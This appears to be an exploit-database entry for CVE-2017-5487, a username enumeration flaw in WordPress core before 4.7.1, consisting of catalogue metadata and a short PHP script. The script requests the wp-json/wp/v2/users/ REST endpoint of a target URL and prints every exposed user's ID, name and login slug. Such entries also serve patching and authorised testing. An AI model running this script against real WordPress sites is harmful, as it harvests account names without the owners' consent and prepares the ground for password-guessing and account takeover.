WordPress Core < 4.7.1 - Username Enumeration

Author: Dctor
type: webapps
platform: php
port: 
date_added: 2017-03-03 
date_updated: 2017-05-04 
verified: 0 
codes: CVE-2017-5487 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comwordpress-4.7.1.zip

#!usr/bin/php
<?php

#Author: Mateus a.k.a Dctor
#fb: fb.com/hatbashbr/
#E-mail: dctoralves@protonmail.ch
#Site: https://mateuslino.tk
header ('Content-type: text/html; charset=UTF-8');


$url= "http://localhost/";
$payload="wp-json/wp/v2/users/";
$urli = file_get_contents($url.$payload);
$json = json_decode($urli, true);
if($json){
	echo "*-----------------------------*\n";
foreach($json as $users){
	echo "[*] ID :  |" .$users['id']     ."|\n";
	echo "[*] Name: |" .$users['name']   ."|\n";
	echo "[*] User :|" .$users['slug']   ."|\n";
	echo "\n";
}echo "*-----------------------------*";}
else{echo "[*] No user";}


?>